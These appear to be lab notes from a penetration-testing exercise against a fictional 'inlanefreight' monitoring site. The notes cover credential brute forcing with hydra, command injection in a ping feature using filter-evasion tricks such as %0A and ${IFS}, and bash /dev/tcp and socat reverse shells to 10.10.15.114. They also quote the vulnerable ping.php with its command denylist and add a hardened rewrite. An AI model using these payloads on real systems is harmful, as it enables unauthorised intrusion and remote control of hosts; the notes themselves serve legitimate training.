### `www.monitoring.inlanefreight.local`
- test login ![[images/Pasted image 20260630085152.png]]
## `monitoring.inlanefreight.local`
- another login ![[images/Pasted image 20260628153132.png]]
- `admin:admin` doesn't work ![[images/Pasted image 20260630195041.png]]
### SQLi
- try SQLi
```bash
sqlmap --batch -r monitoring.inlanefreight.local.req
```
![[images/Pasted image 20260630200257.png]]
### brute force
- we know that invalid creds show: "Invalid Credentials!"
- `request:response` in burp ![[images/Pasted image 20260630200657.png]]
- view source ![[images/Pasted image 20260630200446.png]]
- use `hydra`
```bash
hydra -l admin -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou-50.txt monitoring.inlanefreight.local -f http-post-form "/login:username=^USER^&password=^PASS^:F=Invalid Credentials!"
```
- no hits with `rockyou-50.txt` ![[images/Pasted image 20260630202132.png]]
- no hits with `/usr/share/seclists/Passwords/Leaked-Databases/rockyou-70.txt` ![[images/Pasted image 20260630203620.png]]
- change payload and try some different wordlists
- `/usr/share/seclists/Passwords/2023-200_most_used_passwords.txt`
- `/usr/share/seclists/Passwords/Common-Credentials/xato-net-10-million-passwords-100000.txt`
```bash
hydra -l admin -P /usr/share/seclists/Passwords/2023-200_most_used_passwords.txt monitoring.inlanefreight.local -f http-post-form "/login.php:username=^USER^&password=^PASS^:F=Invalid Credentials"
```
- we have a hit ![[images/Pasted image 20260630203745.png]]
## restricted shell as `inlanefreight/admin`
- logging in with above creds drops me into a GUI-based restricted shell ![[images/Pasted image 20260630204050.png]]
- we have access to a few `.txt` files
- `help` shows what commands we have access to ![[images/Pasted image 20260630204149.png]]
- after looking at `main.js` this is not a real CLI, just a pseudo-CLI written in JavaScript
- with some help from Gemini we find that the `connection_test` command is executing a `ping` on the backend ![[images/Pasted image 20260630205640.png]]
- try to recreate this in browser ![[images/Pasted image 20260630210016.png]]
- `request:response` in burp ![[images/Pasted image 20260630210237.png]]
- unable to change to a POST
- garbage input works even without a real IP address ![[images/Pasted image 20260630211426.png]]
- `127.0.0.1;` is filtered but `127.0.0.1${LS_COLORS:10:1}` is not
- a URL-encoded newline character (`%0A`) works
- can run `ls` but not `id` or `pwd`
```bash
ip=127.0.0.1%0Als
```
![[images/Pasted image 20260630213029.png]]
- try to `cat` file
```bash
ip=127.0.0.1%0Acat${IFS}00112233_flag.txt
```
## revshell
- read `ping.php` and copy+paste into a file
```bash
ip=127.0.0.1%0Acat${IFS}ping.php
```
- contents of `ping.php`
```php
<?php
ini_set('display_errors', 1);
ini_set('display_startup_errors', 1);
error_reporting(E_ALL);
$output = '';
function filter($str)
{
$operators = ['&', '|', ';', '\\', '/', ' '];
foreach ($operators as $operator) {
if (strpos($str, $operator)) {
return true;
}
}
$words = ['whoami', 'echo', 'rm', 'mv', 'cp', 'id', 'curl', 'wget', 'cd', 'sudo', 'mkdir', 'man', 'history', 'ln', 'grep', 'pwd', 'file', 'find', 'kill', 'ps', 'uname', 'hostname', 'date', 'uptime', 'lsof', 'ifconfig', 'ipconfig', 'ip', 'tail', 'netstat', 'tar', 'apt', 'ssh', 'scp', 'less', 'more', 'awk', 'head', 'sed', 'nc', 'netcat'];
foreach ($words as $word) {
if (strpos($str, $word) !== false) {
return true;
}
}
return false;
}
if (isset($_GET['ip'])) {
$ip = $_GET['ip'];
if (filter($ip)) {
$output = "Invalid input";
} else {
$cmd = "bash -c 'ping -c 1 " . $ip . "'";
$output = shell_exec($cmd);
}
}
?>
<?php
echo $output;
?>
```
- `ping.php` filters out common operators and commands
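- as an added example (not the lab's own code), this is how `ping.php` could be written so the parameter never reaches the shell as syntax: allowlist-validate it as an IP address with `filter_var`, then still wrap it in `escapeshellarg`. The denylist above is also fragile on its own terms: the operator loop tests `strpos($str, $operator)` without `!== false`, so an operator at offset 0 is not caught. The CLI self-check at the bottom uses constructed sample inputs.
```php
<?php
// Added example, not the lab's code: allowlist-based replacement for ping.php.
// Only a syntactically valid IPv4/IPv6 address reaches the shell, and even then
// it is single-quoted by escapeshellarg(), so newlines, ${IFS} or
// ${LS_COLORS:10:1} can never be interpreted as shell syntax.
declare(strict_types=1);

function validated_ip(string $raw): ?string
{
    // FILTER_VALIDATE_IP accepts only a bare address: a trailing "\n",
    // ";", spaces or any shell expansion text makes it return false.
    $ip = filter_var($raw, FILTER_VALIDATE_IP);
    return $ip === false ? null : $ip;
}

function build_ping_command(string $ip): string
{
    // escapeshellarg() is defence in depth here; validation already
    // guarantees the value is an address, not a command fragment.
    return 'ping -c 1 ' . escapeshellarg($ip);
}

if (PHP_SAPI !== 'cli') {
    $output = '';
    if (isset($_GET['ip'])) {
        $raw = (string) $_GET['ip'];
        $ip  = validated_ip($raw);
        if ($ip === null) {
            $output = 'Invalid input';
            // Hex-encode the rejected value so the log line itself cannot be
            // forged with newlines, and so a defender can review attempts.
            error_log('ping.php rejected ip parameter: ' . bin2hex($raw));
        } else {
            $output = (string) shell_exec(build_ping_command($ip));
        }
    }
    // Encode on output as well; ping output is untrusted for the browser.
    echo htmlspecialchars($output, ENT_QUOTES, 'UTF-8');
} else {
    // Constructed sample inputs shaped like the ones seen on this page.
    $samples = ["127.0.0.1", "::1", "127.0.0.1\nls", "127.0.0.1;", "127.0.0.1\${IFS}"];
    foreach ($samples as $sample) {
        printf("%-24s => %s\n", json_encode($sample), validated_ip($sample) ?? 'rejected');
    }
}
```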
- the reverse shell below will be tough to deliver given the filtering of `&` and `/`
```bash
/bin/bash -i >& /dev/tcp/10.10.15.114/9001 0>&1
```
- base64 the above command then use below
```bash
ip=127.0.0.1%0Aexport${IFS}CMD="L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE1LjExNC85MDAxIDA+JjE="$(tr${IFS}'!-}'${IFS}'"-~'<<<:)bash<<<$(base64${IFS}-d<<<$CMD)
```
- issues here ![[images/Pasted image 20260630221929.png]]
- check for `socat` on the target ![[images/Pasted image 20260630221910.png]]
- create payload
```bash
ip=127.0.0.1%0Asocat${IFS}TCP:10.10.15.114:9001${IFS}EXEC:${LS_COLORS:10:1}bin${LS_COLORS:10:1}bash
```
- getting a connection that immediately closes ![[images/Pasted image 20260630222353.png]]
- modify payload
```bash
ip=127.0.0.1%0Asocat${IFS}TCP:10.10.15.114:9001${IFS}EXEC:bash
```
- we have a hit ![[images/Pasted image 20260630222557.png]]
- we can read logs in `/var/log` because we are in the `adm` group